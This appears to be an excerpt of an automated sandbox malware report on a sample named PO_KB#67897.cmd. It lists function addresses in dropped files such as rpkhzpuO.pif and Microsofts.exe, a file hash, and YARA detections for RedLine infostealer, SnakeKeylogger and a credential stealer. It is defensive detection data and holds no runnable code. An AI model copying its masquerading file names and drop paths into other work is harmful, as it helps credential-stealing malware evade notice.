                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_004016508_1_00401650
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_00402F208_1_00402F20
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_004193C48_1_004193C4
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_004187888_1_00418788
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_00402F898_1_00402F89
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_00402B908_1_00402B90
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 8_1_004073A08_1_004073A0
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 10_2_0283C16810_2_0283C168
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 10_2_0283CAB010_2_0283CAB0
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 10_2_02837E6810_2_02837E68
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 10_2_02834F0810_2_02834F08
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 10_2_02832DD110_2_02832DD1
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 10_2_0283C38610_2_0283C386
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 10_2_0283CAAE10_2_0283CAAE
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 10_2_0283B9E010_2_0283B9E0
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 10_2_02834EF810_2_02834EF8
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 10_2_02837E6610_2_02837E66
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00B3B49011_2_00B3B490
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00B3B48B11_2_00B3B48B
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_082B3E9811_2_082B3E98
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_00408C6021_2_00408C60
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_0040DC1121_2_0040DC11
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_00407C3F21_2_00407C3F
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_00418CCC21_2_00418CCC
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_00406CA021_2_00406CA0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_004028B021_2_004028B0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_0041A4BE21_2_0041A4BE
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_0041824421_2_00418244
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_0040165021_2_00401650
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_00402F2021_2_00402F20
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_004193C421_2_004193C4
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_0041878821_2_00418788
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_00402F8921_2_00402F89
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_00402B9021_2_00402B90
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_004073A021_2_004073A0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_336B102021_2_336B1020
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_336B103021_2_336B1030
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_36CD47B821_2_36CD47B8
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_2_36CD47B321_2_36CD47B3
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_00408C6021_1_00408C60
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_0040DC1121_1_0040DC11
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_00407C3F21_1_00407C3F
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_00418CCC21_1_00418CCC
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_00406CA021_1_00406CA0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_004028B021_1_004028B0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_0041A4BE21_1_0041A4BE
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_0041824421_1_00418244
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_0040165021_1_00401650
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_00402F2021_1_00402F20
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_004193C421_1_004193C4
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_0041878821_1_00418788
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_00402F8921_1_00402F89
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_00402B9021_1_00402B90
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 21_1_004073A021_1_004073A0
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 22_2_02BC20C422_2_02BC20C4
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_00408C6026_2_00408C60
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_0040DC1126_2_0040DC11
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_00407C3F26_2_00407C3F
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_00418CCC26_2_00418CCC
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_00406CA026_2_00406CA0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_004028B026_2_004028B0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_0041A4BE26_2_0041A4BE
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_0041824426_2_00418244
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_0040165026_2_00401650
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_00402F2026_2_00402F20
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_004193C426_2_004193C4
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_0041878826_2_00418788
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_00402F8926_2_00402F89
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_00402B9026_2_00402B90
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_004073A026_2_004073A0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_2CE6102026_2_2CE61020
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_2CE6103026_2_2CE61030
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_305747B826_2_305747B8
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_2_305747A826_2_305747A8
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_00408C6026_1_00408C60
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_0040DC1126_1_0040DC11
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_00407C3F26_1_00407C3F
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_00418CCC26_1_00418CCC
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_00406CA026_1_00406CA0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_004028B026_1_004028B0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_0041A4BE26_1_0041A4BE
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_0041824426_1_00418244
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_0040165026_1_00401650
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_00402F2026_1_00402F20
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_004193C426_1_004193C4
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_0041878826_1_00418788
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_00402F8926_1_00402F89
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_00402B9026_1_00402B90
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 26_1_004073A026_1_004073A0
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 28_2_02AA20C428_2_02AA20C4
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_00408C6031_2_00408C60
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_0040DC1131_2_0040DC11
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_00407C3F31_2_00407C3F
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_00418CCC31_2_00418CCC
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_00406CA031_2_00406CA0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_004028B031_2_004028B0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_0041A4BE31_2_0041A4BE
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_0041824431_2_00418244
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_0040165031_2_00401650
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_00402F2031_2_00402F20
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_004193C431_2_004193C4
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_0041878831_2_00418788
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_00402F8931_2_00402F89
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_00402B9031_2_00402B90
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_004073A031_2_004073A0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_2D00102031_2_2D001020
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_2D00103031_2_2D001030
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_31FC47B831_2_31FC47B8
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_2_31FC47A831_2_31FC47A8
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_00408C6031_1_00408C60
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_0040DC1131_1_0040DC11
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_00407C3F31_1_00407C3F
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_00418CCC31_1_00418CCC
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_00406CA031_1_00406CA0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_004028B031_1_004028B0
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_0041A4BE31_1_0041A4BE
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_0041824431_1_00418244
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_0040165031_1_00401650
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_00402F2031_1_00402F20
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_004193C431_1_004193C4
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_0041878831_1_00418788
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_00402F8931_1_00402F89
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_00402B9031_1_00402B90
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 31_1_004073A031_1_004073A0
                        Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\rpkhzpuO.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B38798 appears 54 times
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B244D0 appears 32 times
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B246A4 appears 244 times
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B3881C appears 45 times
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B2480C appears 931 times
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B244AC appears 73 times
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02BC480C appears 619 times
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02AB8798 appears 48 times
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02AA46A4 appears 154 times
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02BD8798 appears 48 times
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02BC46A4 appears 154 times
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02AA480C appears 619 times
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 00415639 appears 48 times
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 0040FB9C appears 80 times
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 0040D606 appears 192 times
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 0040E1D8 appears 352 times
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 0040E76A appears 32 times
                        Source: PO_KB#67897.cmdBinary or memory string: OriginalFilenamemsedge.exe> vs PO_KB#67897.cmd
                        Source: 31.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 31.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 31.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 26.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 31.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 8.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 26.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 26.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 26.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 8.2.rpkhzpuO.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 21.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 8.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 8.2.rpkhzpuO.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 0000001A.00000002.2555582256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 0000001F.00000002.2653640305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
